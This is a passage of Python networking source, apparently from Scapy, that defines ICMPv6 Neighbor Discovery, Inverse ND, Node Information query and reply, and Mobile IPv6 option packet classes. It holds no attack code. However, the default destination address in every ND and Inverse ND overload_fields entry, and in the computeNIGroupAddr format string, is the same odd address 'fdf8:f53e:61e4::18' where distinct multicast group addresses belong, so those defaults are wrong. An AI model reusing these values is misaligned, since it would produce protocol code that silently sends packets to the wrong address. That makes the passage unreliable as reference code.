def guess_payload_class(self,p):
if len(p) > 1:
return get_cls(icmp6ndoptscls.get(ord(p[0]),"Raw"), "Raw") # s/Raw/ICMPv6NDOptUnknown/g ?
# Beginning of ICMPv6 Neighbor Discovery Options.
class ICMPv6NDOptUnknown(_ICMPv6NDGuessPayload, Packet):
name = "ICMPv6 Neighbor Discovery Option - Scapy Unimplemented"
fields_desc = [ ByteField("type",None),
FieldLenField("len",None,length_of="data",fmt="B",
adjust = lambda pkt,x: x+2),
StrLenField("data","",
length_from = lambda pkt: pkt.len-2) ]
# NOTE: len includes type and len field. Expressed in unit of 8 bytes
# TODO: Revoir le coup du ETHER_ANY
class ICMPv6NDOptSrcLLAddr(_ICMPv6NDGuessPayload, Packet):
name = "ICMPv6 Neighbor Discovery Option - Source Link-Layer Address"
fields_desc = [ ByteField("type", 1),
ByteField("len", 1),
MACField("lladdr", ETHER_ANY) ]
def mysummary(self):
return self.sprintf("%name% %lladdr%")
class ICMPv6NDOptDstLLAddr(ICMPv6NDOptSrcLLAddr):
name = "ICMPv6 Neighbor Discovery Option - Destination Link-Layer Address"
type = 2
class ICMPv6NDOptPrefixInfo(_ICMPv6NDGuessPayload, Packet):
name = "ICMPv6 Neighbor Discovery Option - Prefix Information"
fields_desc = [ ByteField("type",3),
ByteField("len",4),
ByteField("prefixlen",None),
BitField("L",1,1),
BitField("A",1,1),
BitField("R",0,1),
BitField("res1",0,5),
XIntField("validlifetime",0xffffffffL),
XIntField("preferredlifetime",0xffffffffL),
XIntField("res2",0x00000000),
IP6Field("prefix","::") ]
def mysummary(self):
return self.sprintf("%name% %prefix%")
# TODO: We should also limit the size of included packet to something
# like (initiallen - 40 - 2)
class TruncPktLenField(PacketLenField):
def __init__(self, name, default, cls, cur_shift, length_from=None, shift=0):
PacketLenField.__init__(self, name, default, cls, length_from=length_from)
self.cur_shift = cur_shift
def getfield(self, pkt, s):
l = self.length_from(pkt)
i = self.m2i(pkt, s[:l])
return s[l:],i
def m2i(self, pkt, m):
s = None
try: # It can happen we have sth shorter than 40 bytes
s = self.cls(m)
except:
return conf.raw_layer(m)
return s
def i2m(self, pkt, x):
s = str(x)
l = len(s)
r = (l + self.cur_shift) % 8
l = l - r
return s[:l]
def i2len(self, pkt, i):
return len(self.i2m(pkt, i))
# Faire un post_build pour le recalcul de la taille (en multiple de 8 octets)
class ICMPv6NDOptRedirectedHdr(_ICMPv6NDGuessPayload, Packet):
name = "ICMPv6 Neighbor Discovery Option - Redirected Header"
fields_desc = [ ByteField("type",4),
FieldLenField("len", None, length_of="pkt", fmt="B",
adjust = lambda pkt,x:(x+8)/8),
StrFixedLenField("res", "\x00"*6, 6),
TruncPktLenField("pkt", "", IPv6, 8,
length_from = lambda pkt: 8*pkt.len-8) ]
# See which value should be used for default MTU instead of 1280
class ICMPv6NDOptMTU(_ICMPv6NDGuessPayload, Packet):
name = "ICMPv6 Neighbor Discovery Option - MTU"
fields_desc = [ ByteField("type",5),
ByteField("len",1),
XShortField("res",0),
IntField("mtu",1280)]
class ICMPv6NDOptShortcutLimit(_ICMPv6NDGuessPayload, Packet): # RFC 2491
name = "ICMPv6 Neighbor Discovery Option - NBMA Shortcut Limit"
fields_desc = [ ByteField("type", 6),
ByteField("len", 1),
ByteField("shortcutlim", 40), # XXX
ByteField("res1", 0),
IntField("res2", 0) ]
class ICMPv6NDOptAdvInterval(_ICMPv6NDGuessPayload, Packet):
name = "ICMPv6 Neighbor Discovery - Interval Advertisement"
fields_desc = [ ByteField("type",7),
ByteField("len",1),
ShortField("res", 0),
IntField("advint", 0) ]
def mysummary(self):
return self.sprintf("%name% %advint% milliseconds")
class ICMPv6NDOptHAInfo(_ICMPv6NDGuessPayload, Packet):
name = "ICMPv6 Neighbor Discovery - Home Agent Information"
fields_desc = [ ByteField("type",8),
ByteField("len",1),
ShortField("res", 0),
ShortField("pref", 0),
ShortField("lifetime", 1)]
def mysummary(self):
return self.sprintf("%name% %pref% %lifetime% seconds")
# type 9 : See ICMPv6NDOptSrcAddrList class below in IND (RFC 3122) support
# type 10 : See ICMPv6NDOptTgtAddrList class below in IND (RFC 3122) support
class ICMPv6NDOptIPAddr(_ICMPv6NDGuessPayload, Packet): # RFC 4068
name = "ICMPv6 Neighbor Discovery - IP Address Option (FH for MIPv6)"
fields_desc = [ ByteField("type",17),
ByteField("len", 3),
ByteEnumField("optcode", 1, {1: "Old Care-Of Address",
2: "New Care-Of Address",
3: "NAR's IP address" }),
ByteField("plen", 64),
IntField("res", 0),
IP6Field("addr", "::") ]
class ICMPv6NDOptNewRtrPrefix(_ICMPv6NDGuessPayload, Packet): # RFC 4068
name = "ICMPv6 Neighbor Discovery - New Router Prefix Information Option (FH for MIPv6)"
fields_desc = [ ByteField("type",18),
ByteField("len", 3),
ByteField("optcode", 0),
ByteField("plen", 64),
IntField("res", 0),
IP6Field("prefix", "::") ]
_rfc4068_lla_optcode = {0: "Wildcard requesting resolution for all nearby AP",
1: "LLA for the new AP",
2: "LLA of the MN",
3: "LLA of the NAR",
4: "LLA of the src of TrSolPr or PrRtAdv msg",
5: "AP identified by LLA belongs to current iface of router",
6: "No preifx info available for AP identified by the LLA",
7: "No fast handovers support for AP identified by the LLA" }
class ICMPv6NDOptLLA(_ICMPv6NDGuessPayload, Packet): # RFC 4068
name = "ICMPv6 Neighbor Discovery - Link-Layer Address (LLA) Option (FH for MIPv6)"
fields_desc = [ ByteField("type", 19),
ByteField("len", 1),
ByteEnumField("optcode", 0, _rfc4068_lla_optcode),
MACField("lla", ETHER_ANY) ] # We only support ethernet
class ICMPv6NDOptMAP(_ICMPv6NDGuessPayload, Packet): # RFC 4140
name = "ICMPv6 Neighbor Discovery - MAP Option"
fields_desc = [ ByteField("type", 23),
ByteField("len", 3),
BitField("dist", 1, 4),
BitField("pref", 15, 4), # highest availability
BitField("R", 1, 1),
BitField("res", 0, 7),
IntField("validlifetime", 0xffffffff),
IP6Field("addr", "::") ]
class IP6PrefixField(IP6Field):
def __init__(self, name, default):
IP6Field.__init__(self, name, default)
self.length_from = lambda pkt: 8*(pkt.len - 1)
def addfield(self, pkt, s, val):
return s + self.i2m(pkt, val)
def getfield(self, pkt, s):
l = self.length_from(pkt)
p = s[:l]
if l < 16:
p += '\x00'*(16-l)
return s[l:], self.m2i(pkt,p)
def i2len(self, pkt, x):
return len(self.i2m(pkt, x))
def i2m(self, pkt, x):
l = pkt.len
if x is None:
x = "::"
if l is None:
l = 1
x = inet_pton(socket.AF_INET6, x)
if l is None:
return x
if l in [0, 1]:
return ""
if l in [2, 3]:
return x[:8*(l-1)]
return x + '\x00'*8*(l-3)
class ICMPv6NDOptRouteInfo(_ICMPv6NDGuessPayload, Packet): # RFC 4191
name = "ICMPv6 Neighbor Discovery Option - Route Information Option"
fields_desc = [ ByteField("type",24),
FieldLenField("len", None, length_of="prefix", fmt="B",
adjust = lambda pkt,x: x/8 + 1),
ByteField("plen", None),
BitField("res1",0,3),
BitField("prf",0,2),
BitField("res2",0,3),
IntField("rtlifetime", 0xffffffff),
IP6PrefixField("prefix", None) ]
class ICMPv6NDOptRDNSS(_ICMPv6NDGuessPayload, Packet): # RFC 5006
name = "ICMPv6 Neighbor Discovery Option - Recursive DNS Server Option"
fields_desc = [ ByteField("type", 25),
FieldLenField("len", None, count_of="dns", fmt="B",
adjust = lambda pkt,x: 2*x+1),
ShortField("res", None),
IntField("lifetime", 0xffffffff),
IP6ListField("dns", [],
length_from = lambda pkt: 8*(pkt.len-1)) ]
class ICMPv6NDOptEFA(_ICMPv6NDGuessPayload, Packet): # RFC 5175 (prev. 5075)
name = "ICMPv6 Neighbor Discovery Option - Expanded Flags Option"
fields_desc = [ ByteField("type", 26),
ByteField("len", 1),
BitField("res", 0, 48) ]
# End of ICMPv6 Neighbor Discovery Options.
class ICMPv6ND_RS(_ICMPv6NDGuessPayload, _ICMPv6):
name = "ICMPv6 Neighbor Discovery - Router Solicitation"
fields_desc = [ ByteEnumField("type", 133, icmp6types),
ByteField("code",0),
XShortField("cksum", None),
IntField("res",0) ]
overload_fields = {IPv6: { "nh": 58, "dst": "fdf8:f53e:61e4::18", "hlim": 255 }}
class ICMPv6ND_RA(_ICMPv6NDGuessPayload, _ICMPv6):
name = "ICMPv6 Neighbor Discovery - Router Advertisement"
fields_desc = [ ByteEnumField("type", 134, icmp6types),
ByteField("code",0),
XShortField("cksum", None),
ByteField("chlim",0),
BitField("M",0,1),
BitField("O",0,1),
BitField("H",0,1),
BitEnumField("prf",1,2, { 0: "Medium (default)",
1: "High",
2: "Reserved",
3: "Low" } ), # RFC 4191
BitField("P",0,1),
BitField("res",0,2),
ShortField("routerlifetime",1800),
IntField("reachabletime",0),
IntField("retranstimer",0) ]
overload_fields = {IPv6: { "nh": 58, "dst": "fdf8:f53e:61e4::18", "hlim": 255 }}
def answers(self, other):
return isinstance(other, ICMPv6ND_RS)
class ICMPv6ND_NS(_ICMPv6NDGuessPayload, _ICMPv6, Packet):
name = "ICMPv6 Neighbor Discovery - Neighbor Solicitation"
fields_desc = [ ByteEnumField("type",135, icmp6types),
ByteField("code",0),
XShortField("cksum", None),
IntField("res", 0),
IP6Field("tgt","::") ]
overload_fields = {IPv6: { "nh": 58, "dst": "fdf8:f53e:61e4::18", "hlim": 255 }}
def mysummary(self):
return self.sprintf("%name% (tgt: %tgt%)")
def hashret(self):
return self.tgt+self.payload.hashret()
class ICMPv6ND_NA(_ICMPv6NDGuessPayload, _ICMPv6, Packet):
name = "ICMPv6 Neighbor Discovery - Neighbor Advertisement"
fields_desc = [ ByteEnumField("type",136, icmp6types),
ByteField("code",0),
XShortField("cksum", None),
BitField("R",1,1),
BitField("S",0,1),
BitField("O",1,1),
XBitField("res",0,29),
IP6Field("tgt","::") ]
overload_fields = {IPv6: { "nh": 58, "dst": "fdf8:f53e:61e4::18", "hlim": 255 }}
def mysummary(self):
return self.sprintf("%name% (tgt: %tgt%)")
def hashret(self):
return self.tgt+self.payload.hashret()
def answers(self, other):
return isinstance(other, ICMPv6ND_NS) and self.tgt == other.tgt
# associated possible options : target link-layer option, Redirected header
class ICMPv6ND_Redirect(_ICMPv6NDGuessPayload, _ICMPv6, Packet):
name = "ICMPv6 Neighbor Discovery - Redirect"
fields_desc = [ ByteEnumField("type",137, icmp6types),
ByteField("code",0),
XShortField("cksum", None),
XIntField("res",0),
IP6Field("tgt","::"),
IP6Field("dst","::") ]
overload_fields = {IPv6: { "nh": 58, "dst": "fdf8:f53e:61e4::18", "hlim": 255 }}
################ ICMPv6 Inverse Neighbor Discovery (RFC 3122) ###############
class ICMPv6NDOptSrcAddrList(_ICMPv6NDGuessPayload, Packet):
name = "ICMPv6 Inverse Neighbor Discovery Option - Source Address List"
fields_desc = [ ByteField("type",9),
FieldLenField("len", None, count_of="addrlist", fmt="B",
adjust = lambda pkt,x: 2*x+1),
StrFixedLenField("res", "\x00"*6, 6),
IP6ListField("addrlist", [],
length_from = lambda pkt: 8*(pkt.len-1)) ]
class ICMPv6NDOptTgtAddrList(ICMPv6NDOptSrcAddrList):
name = "ICMPv6 Inverse Neighbor Discovery Option - Target Address List"
type = 10
# RFC3122
# Options requises : source lladdr et target lladdr
# Autres options valides : source address list, MTU
# - Comme precise dans le document, il serait bien de prendre l'adresse L2
# demandee dans l'option requise target lladdr et l'utiliser au niveau
# de l'adresse destination ethernet si aucune adresse n'est precisee
# - ca semble pas forcement pratique si l'utilisateur doit preciser toutes
# les options.
# Ether() must use the target lladdr as destination
class ICMPv6ND_INDSol(_ICMPv6NDGuessPayload, _ICMPv6):
name = "ICMPv6 Inverse Neighbor Discovery Solicitation"
fields_desc = [ ByteEnumField("type",141, icmp6types),
ByteField("code",0),
XShortField("cksum",None),
XIntField("reserved",0) ]
overload_fields = {IPv6: { "nh": 58, "dst": "fdf8:f53e:61e4::18", "hlim": 255 }}
# Options requises : target lladdr, target address list
# Autres options valides : MTU
class ICMPv6ND_INDAdv(_ICMPv6NDGuessPayload, _ICMPv6):
name = "ICMPv6 Inverse Neighbor Discovery Advertisement"
fields_desc = [ ByteEnumField("type",142, icmp6types),
ByteField("code",0),
XShortField("cksum",None),
XIntField("reserved",0) ]
overload_fields = {IPv6: { "nh": 58, "dst": "fdf8:f53e:61e4::18", "hlim": 255 }}
###############################################################################
# ICMPv6 Node Information Queries (RFC 4620)
###############################################################################
# [ ] Add automatic destination address computation using computeNIGroupAddr
# in IPv6 class (Scapy6 modification when integrated) if :
# - it is not provided
# - upper layer is ICMPv6NIQueryName() with a valid value
# [ ] Try to be liberal in what we accept as internal values for _explicit_
# DNS elements provided by users. Any string should be considered
# valid and kept like it has been provided. At the moment, i2repr() will
# crash on many inputs
# [ ] Do the documentation
# [ ] Add regression tests
# [ ] Perform test against real machines (NOOP reply is proof of implementation).
# [ ] Check if there are differences between different stacks. Among *BSD,
# with others.
# [ ] Deal with flags in a consistent way.
# [ ] Implement compression in names2dnsrepr() and decompresiion in
# dnsrepr2names(). Should be deactivable.
icmp6_niqtypes = { 0: "NOOP",
2: "Node Name",
3: "IPv6 Address",
4: "IPv4 Address" }
class _ICMPv6NIHashret:
def hashret(self):
return self.nonce
class _ICMPv6NIAnswers:
def answers(self, other):
return self.nonce == other.nonce
# Buggy; always returns the same value during a session
class NonceField(StrFixedLenField):
def __init__(self, name, default=None):
StrFixedLenField.__init__(self, name, default, 8)
if default is None:
self.default = self.randval()
# Compute the NI group Address. Can take a FQDN as input parameter
def computeNIGroupAddr(name):
import md5
name = name.lower().split(".")[0]
record = chr(len(name))+name
h = md5.new(record)
h = h.digest()
addr = "fdf8:f53e:61e4::18:%2x%2x:%2x%2x" % struct.unpack("BBBB", h[:4])
return addr
# Here is the deal. First, that protocol is a piece of shit. Then, we
# provide 4 classes for the different kinds of Requests (one for every
# valid qtype: NOOP, Node Name, IPv6@, IPv4@). They all share the same
# data field class that is made to be smart by guessing the specifc
# type of value provided :
#
# - IPv6 if acceptable for inet_pton(AF_INET6, ): code is set to 0,
# if not overriden by user
# - IPv4 if acceptable for inet_pton(AF_INET, ): code is set to 2,
# if not overriden
# - Name in the other cases: code is set to 0, if not overriden by user
#
# Internal storage, is not only the value, but the a pair providing
# the type and the value (1 is IPv6@, 1 is Name or string, 2 is IPv4@)
#
# Note : I merged getfield() and m2i(). m2i() should not be called
# directly anyway. Same remark for addfield() and i2m()
#
# -- arno
# "The type of information present in the Data field of a query is
# declared by the ICMP Code, whereas the type of information in a
# Reply is determined by the Qtype"
def names2dnsrepr(x):
"""
Take as input a list of DNS names or a single DNS name
and encode it in DNS format (with possible compression)
If a string that is already a DNS name in DNS format
is passed, it is returned unmodified. Result is a string.
!!! At the moment, compression is not implemented !!!
"""
if type(x) is str:
if x and x[-1] == '\x00': # stupid heuristic
return x
x = [x]
res = []
for n in x:
termin = "\x00"
if n.count('.') == 0: # single-component gets one more
termin += '\x00'
n = "".join(map(lambda y: chr(len(y))+y, n.split("."))) + termin
res.append(n)
return "".join(res)
def dnsrepr2names(x):
"""
Take as input a DNS encoded string (possibly compressed)
and returns a list of DNS names contained in it.
If provided string is already in printable format
(does not end with a null character, a one element list
is returned). Result is a list.
"""
res = []
cur = ""
while x:
l = ord(x[0])
x = x[1:]
if l == 0:
if cur and cur[-1] == '.':
cur = cur[:-1]
res.append(cur)
cur = ""
if x and ord(x[0]) == 0: # single component
x = x[1:]
continue
if l & 0xc0: # XXX TODO : work on that -- arno
raise Exception("DNS message can't be compressed at this point!")
else:
cur += x[:l]+"."
x = x[l:]
return res
class NIQueryDataField(StrField):
def __init__(self, name, default):
StrField.__init__(self, name, default)
def i2h(self, pkt, x):
if x is None:
return x
t,val = x
if t == 1:
val = dnsrepr2names(val)[0]
return val
def h2i(self, pkt, x):
if x is tuple and type(x[0]) is int:
return x
val = None
try: # Try IPv6
inet_pton(socket.AF_INET6, x)
val = (0, x)
except:
try: # Try IPv4
inet_pton(socket.AF_INET, x)
val = (2, x)
except: # Try DNS
if x is None:
x = ""
x = names2dnsrepr(x)
val = (1, x)
return val
def i2repr(self, pkt, x):
t,val = x
if t == 1: # DNS Name
# we don't use dnsrepr2names() to deal with
# possible weird data extracted info
res = []
weird = None
while val:
l = ord(val[0])
val = val[1:]
if l == 0:
if (len(res) > 1 and val): # fqdn with data behind
weird = val
elif len(val) > 1: # single label with data behind
weird = val[1:]
break
res.append(val[:l]+".")
val = val[l:]
tmp = "".join(res)
if tmp and tmp[-1] == '.':
tmp = tmp[:-1]
return tmp
return repr(val)
def getfield(self, pkt, s):
qtype = getattr(pkt, "qtype")
if qtype == 0: # NOOP
return s, (0, "")
else:
code = getattr(pkt, "code")
if code == 0: # IPv6 Addr
return s[16:], (0, inet_ntop(socket.AF_INET6, s[:16]))
elif code == 2: # IPv4 Addr
return s[4:], (2, inet_ntop(socket.AF_INET, s[:4]))
else: # Name or Unknown
return "", (1, s)
def addfield(self, pkt, s, val):
if ((type(val) is tuple and val[1] is None) or
val is None):
val = (1, "")
t = val[0]
if t == 1:
return s + val[1]
elif t == 0:
return s + inet_pton(socket.AF_INET6, val[1])
else:
return s + inet_pton(socket.AF_INET, val[1])
class NIQueryCodeField(ByteEnumField):
def i2m(self, pkt, x):
if x is None:
d = pkt.getfieldval("data")
if d is None:
return 1
elif d[0] == 0: # IPv6 address
return 0
elif d[0] == 1: # Name
return 1
elif d[0] == 2: # IPv4 address
return 2
else:
return 1
return x
_niquery_code = {0: "IPv6 Query", 1: "Name Query", 2: "IPv4 Query"}
#_niquery_flags = { 2: "All unicast addresses", 4: "IPv4 addresses",
# 8: "Link-local addresses", 16: "Site-local addresses",
# 32: "Global addresses" }
# "This NI type has no defined flags and never has a Data Field". Used
# to know if the destination is up and implements NI protocol.
class ICMPv6NIQueryNOOP(_ICMPv6NIHashret, _ICMPv6):
name = "ICMPv6 Node Information Query - NOOP Query"
fields_desc = [ ByteEnumField("type", 139, icmp6types),
NIQueryCodeField("code", None, _niquery_code),
XShortField("cksum", None),
ShortEnumField("qtype", 0, icmp6_niqtypes),
BitField("unused", 0, 10),
FlagsField("flags", 0, 6, "TACLSG"),
NonceField("nonce", None),
NIQueryDataField("data", None) ]
class ICMPv6NIQueryName(ICMPv6NIQueryNOOP):
name = "ICMPv6 Node Information Query - IPv6 Name Query"
qtype = 2
# We ask for the IPv6 address of the peer
class ICMPv6NIQueryIPv6(ICMPv6NIQueryNOOP):
name = "ICMPv6 Node Information Query - IPv6 Address Query"
qtype = 3
flags = 0x3E
class ICMPv6NIQueryIPv4(ICMPv6NIQueryNOOP):
name = "ICMPv6 Node Information Query - IPv4 Address Query"
qtype = 4
_nireply_code = { 0: "Successful Reply",
1: "Response Refusal",
3: "Unknown query type" }
_nireply_flags = { 1: "Reply set incomplete",
2: "All unicast addresses",
4: "IPv4 addresses",
8: "Link-local addresses",
16: "Site-local addresses",
32: "Global addresses" }
# Internal repr is one of those :
# (0, "some string") : unknow qtype value are mapped to that one
# (3, [ (ttl, ip6), ... ])
# (4, [ (ttl, ip4), ... ])
# (2, [ttl, dns_names]) : dns_names is one string that contains
# all the DNS names. Internally it is kept ready to be sent
# (undissected). i2repr() decode it for user. This is to
# make build after dissection bijective.
#
# I also merged getfield() and m2i(), and addfield() and i2m().
class NIReplyDataField(StrField):
def i2h(self, pkt, x):
if x is None:
return x
t,val = x
if t == 2:
ttl, dnsnames = val
val = [ttl] + dnsrepr2names(dnsnames)
return val
def h2i(self, pkt, x):
qtype = 0 # We will decode it as string if not
# overridden through 'qtype' in pkt
# No user hint, let's use 'qtype' value for that purpose
if type(x) is not tuple:
if pkt is not None:
qtype = getattr(pkt, "qtype")
else:
qtype = x[0]
x = x[1]
# From that point on, x is the value (second element of the tuple)
if qtype == 2: # DNS name
if type(x) is str: # listify the string
x = [x]
if type(x) is list and x and type(x[0]) is not int: # ttl was omitted : use 0
x = [0] + x
ttl = x[0]
names = x[1:]
return (2, [ttl, names2dnsrepr(names)])
elif qtype in [3, 4]: # IPv4 or IPv6 addr
if type(x) is str:
x = [x] # User directly provided an IP, instead of list
# List elements are not tuples, user probably
# omitted ttl value : we will use 0 instead
def addttl(x):
if type(x) is str:
return (0, x)
return x
return (qtype, map(addttl, x))
return (qtype, x)
def addfield(self, pkt, s, val):
t,tmp = val
if tmp is None:
tmp = ""
if t == 2:
ttl,dnsstr = tmp
return s+ struct.pack("!I", ttl) + dnsstr
elif t == 3:
return s + "".join(map(lambda (x,y): struct.pack("!I", x)+inet_pton(socket.AF_INET6, y), tmp))
elif t == 4:
return s + "".join(map(lambda (x,y): struct.pack("!I", x)+inet_pton(socket.AF_INET, y), tmp))
else:
return s + tmp
def getfield(self, pkt, s):
code = getattr(pkt, "code")
if code != 0:
return s, (0, "")
qtype = getattr(pkt, "qtype")
if qtype == 0: # NOOP
return s, (0, "")
elif qtype == 2:
if len(s) < 4:
return s, (0, "")
ttl = struct.unpack("!I", s[:4])[0]
return "", (2, [ttl, s[4:]])
elif qtype == 3: # IPv6 addresses with TTLs
# XXX TODO : get the real length
res = []
while len(s) >= 20: # 4 + 16
ttl = struct.unpack("!I", s[:4])[0]
ip = inet_ntop(socket.AF_INET6, s[4:20])
res.append((ttl, ip))
s = s[20:]
return s, (3, res)
elif qtype == 4: # IPv4 addresses with TTLs
# XXX TODO : get the real length
res = []
while len(s) >= 8: # 4 + 4
ttl = struct.unpack("!I", s[:4])[0]
ip = inet_ntop(socket.AF_INET, s[4:8])
res.append((ttl, ip))
s = s[8:]
return s, (4, res)
else:
# XXX TODO : implement me and deal with real length
return "", (0, s)
def i2repr(self, pkt, x):
if x is None:
return "[]"
if type(x) is tuple and len(x) == 2:
t, val = x
if t == 2: # DNS names
ttl,l = val
l = dnsrepr2names(l)
return "ttl:%d %s" % (ttl, ", ".join(l))
elif t == 3 or t == 4:
return "[ %s ]" % (", ".join(map(lambda (x,y): "(%d, %s)" % (x, y), val)))
return repr(val)
return repr(x) # XXX should not happen
# By default, sent responses have code set to 0 (successful)
class ICMPv6NIReplyNOOP(_ICMPv6NIAnswers, _ICMPv6NIHashret, _ICMPv6):
name = "ICMPv6 Node Information Reply - NOOP Reply"
fields_desc = [ ByteEnumField("type", 140, icmp6types),
ByteEnumField("code", 0, _nireply_code),
XShortField("cksum", None),
ShortEnumField("qtype", 0, icmp6_niqtypes),
BitField("unused", 0, 10),
FlagsField("flags", 0, 6, "TACLSG"),
NonceField("nonce", None),
NIReplyDataField("data", None)]
class ICMPv6NIReplyName(ICMPv6NIReplyNOOP):
name = "ICMPv6 Node Information Reply - Node Names"
qtype = 2
class ICMPv6NIReplyIPv6(ICMPv6NIReplyNOOP):
name = "ICMPv6 Node Information Reply - IPv6 addresses"
qtype = 3
class ICMPv6NIReplyIPv4(ICMPv6NIReplyNOOP):
name = "ICMPv6 Node Information Reply - IPv4 addresses"
qtype = 4
class ICMPv6NIReplyRefuse(ICMPv6NIReplyNOOP):
name = "ICMPv6 Node Information Reply - Responder refuses to supply answer"
code = 1
class ICMPv6NIReplyUnknown(ICMPv6NIReplyNOOP):
name = "ICMPv6 Node Information Reply - Qtype unknown to the responder"
code = 2
def _niquery_guesser(p):
cls = conf.raw_layer
type = ord(p[0])
if type == 139: # Node Info Query specific stuff
if len(p) > 6:
qtype, = struct.unpack("!H", p[4:6])
cls = { 0: ICMPv6NIQueryNOOP,
2: ICMPv6NIQueryName,
3: ICMPv6NIQueryIPv6,
4: ICMPv6NIQueryIPv4 }.get(qtype, conf.raw_layer)
elif type == 140: # Node Info Reply specific stuff
code = ord(p[1])
if code == 0:
if len(p) > 6:
qtype, = struct.unpack("!H", p[4:6])
cls = { 2: ICMPv6NIReplyName,
3: ICMPv6NIReplyIPv6,
4: ICMPv6NIReplyIPv4 }.get(qtype, ICMPv6NIReplyNOOP)
elif code == 1:
cls = ICMPv6NIReplyRefuse
elif code == 2:
cls = ICMPv6NIReplyUnknown
return cls
#############################################################################
#############################################################################
### Mobile IPv6 (RFC 3775) and Nemo (RFC 3963) ###
#############################################################################
#############################################################################
# Mobile IPv6 ICMPv6 related classes
class ICMPv6HAADRequest(_ICMPv6):
name = 'ICMPv6 Home Agent Address Discovery Request'
fields_desc = [ ByteEnumField("type", 144, icmp6types),
ByteField("code", 0),
XShortField("cksum", None),
XShortField("id", None),
BitEnumField("R", 1, 1, {1: 'MR'}),
XBitField("res", 0, 15) ]
def hashret(self):
return struct.pack("!H",self.id)+self.payload.hashret()
class ICMPv6HAADReply(_ICMPv6):
name = 'ICMPv6 Home Agent Address Discovery Reply'
fields_desc = [ ByteEnumField("type", 145, icmp6types),
ByteField("code", 0),
XShortField("cksum", None),
XShortField("id", None),
BitEnumField("R", 1, 1, {1: 'MR'}),
XBitField("res", 0, 15),
IP6ListField('addresses', None) ]
def hashret(self):
return struct.pack("!H",self.id)+self.payload.hashret()
def answers(self, other):
if not isinstance(other, ICMPv6HAADRequest):
return 0
return self.id == other.id
class ICMPv6MPSol(_ICMPv6):
name = 'ICMPv6 Mobile Prefix Solicitation'
fields_desc = [ ByteEnumField("type", 146, icmp6types),
ByteField("code", 0),
XShortField("cksum", None),
XShortField("id", None),
XShortField("res", 0) ]
def _hashret(self):
return struct.pack("!H",self.id)
class ICMPv6MPAdv(_ICMPv6NDGuessPayload, _ICMPv6):
name = 'ICMPv6 Mobile Prefix Advertisement'
fields_desc = [ ByteEnumField("type", 147, icmp6types),
ByteField("code", 0),
XShortField("cksum", None),
XShortField("id", None),
BitEnumField("flags", 2, 2, {2: 'M', 1:'O'}),
XBitField("res", 0, 14) ]
def hashret(self):
return struct.pack("!H",self.id)
def answers(self, other):
return isinstance(other, ICMPv6MPSol)
# Mobile IPv6 Options classes
_mobopttypes = { 2: "Binding Refresh Advice",
3: "Alternate Care-of Address",
4: "Nonce Indices",
5: "Binding Authorization Data",
6: "Mobile Network Prefix (RFC3963)",
7: "Link-Layer Address (RFC4068)",
8: "Mobile Node Identifier (RFC4283)",
9: "Mobility Message Authentication (RFC4285)",
10: "Replay Protection (RFC4285)",
11: "CGA Parameters Request (RFC4866)",
12: "CGA Parameters (RFC4866)",
13: "Signature (RFC4866)",
14: "Home Keygen Token (RFC4866)",
15: "Care-of Test Init (RFC4866)",
16: "Care-of Test (RFC4866)" }
class _MIP6OptAlign:
""" Mobile IPv6 options have alignment requirements of the form x*n+y.
This class is inherited by all MIPv6 options to help in computing the
required Padding for that option, i.e. the need for a Pad1 or PadN
option before it. They only need to provide x and y as class
parameters. (x=0 and y=0 are used when no alignment is required)"""
def alignment_delta(self, curpos):
x = self.x ; y = self.y
if x == 0 and y ==0:
return 0
delta = x*((curpos - y + x - 1)/x) + y - curpos
return delta
class MIP6OptBRAdvice(_MIP6OptAlign, Packet):
name = 'Mobile IPv6 Option - Binding Refresh Advice'
fields_desc = [ ByteEnumField('otype', 2, _mobopttypes),
ByteField('olen', 2),
ShortField('rinter', 0) ]
x = 2 ; y = 0# alignment requirement: 2n
class MIP6OptAltCoA(_MIP6OptAlign, Packet):
name = 'MIPv6 Option - Alternate Care-of Address'
fields_desc = [ ByteEnumField('otype', 3, _mobopttypes),
ByteField('olen', 16),
IP6Field("acoa", "::") ]
x = 8 ; y = 6 # alignment requirement: 8n+6
class MIP6OptNonceIndices(_MIP6OptAlign, Packet):
name = 'MIPv6 Option - Nonce Indices'
fields_desc = [ ByteEnumField('otype', 4, _mobopttypes),
ByteField('olen', 16),
ShortField('hni', 0),
ShortField('coni', 0) ]
x = 2 ; y = 0 # alignment requirement: 2n
class MIP6OptBindingAuthData(_MIP6OptAlign, Packet):
name = 'MIPv6 Option - Binding Authorization Data'
fields_desc = [ ByteEnumField('otype', 5, _mobopttypes),
ByteField('olen', 16),
BitField('authenticator', 0, 96) ]
x = 8 ; y = 2 # alignment requirement: 8n+2
class MIP6OptMobNetPrefix(_MIP6OptAlign, Packet): # NEMO - RFC 3963
name = 'NEMO Option - Mobile Network Prefix'
fields_desc = [ ByteEnumField("otype", 6, _mobopttypes),
ByteField("olen", 18),
ByteField("reserved", 0),
ByteField("plen", 64),
IP6Field("prefix", "::") ]
x = 8 ; y = 4 # alignment requirement: 8n+4
class MIP6OptLLAddr(_MIP6OptAlign, Packet): # Sect 6.4.4 of RFC 4068
name = "MIPv6 Option - Link-Layer Address (MH-LLA)"
fields_desc = [ ByteEnumField("otype", 7, _mobopttypes),
ByteField("olen", 7),
ByteEnumField("ocode", 2, _rfc4068_lla_optcode),
ByteField("pad", 0),
MACField("lla", ETHER_ANY) ] # Only support ethernet
x = 0 ; y = 0 # alignment requirement: none
class MIP6OptMNID(_MIP6OptAlign, Packet): # RFC 4283
name = "MIPv6 Option - Mobile Node Identifier"
fields_desc = [ ByteEnumField("otype", 8, _mobopttypes),
FieldLenField("olen", None, length_of="id", fmt="B",
adjust = lambda pkt,x: x+1),
ByteEnumField("subtype", 1, {1: "NAI"}),
StrLenField("id", "",
length_from = lambda pkt: pkt.olen-1) ]
x = 0 ; y = 0 # alignment requirement: none
# We only support decoding and basic build. Automatic HMAC computation is
# too much work for our current needs. It is left to the user (I mean ...
# you). --arno
class MIP6OptMsgAuth(_MIP6OptAlign, Packet): # RFC 4285 (Sect. 5)
name = "MIPv6 Option - Mobility Message Authentication"
fields_desc = [ ByteEnumField("otype", 9, _mobopttypes),
FieldLenField("olen", None, length_of="authdata", fmt="B",
adjust = lambda pkt,x: x+5),
ByteEnumField("subtype", 1, {1: "MN-HA authentication mobility option",
2: "MN-AAA authentication mobility option"}),
IntField("mspi", None),
StrLenField("authdata", "A"*12,
length_from = lambda pkt: pkt.olen-5) ]
x = 4 ; y = 1 # alignment requirement: 4n+1
# Extracted from RFC 1305 (NTP) :
# NTP timestamps are represented as a 64-bit unsigned fixed-point number,
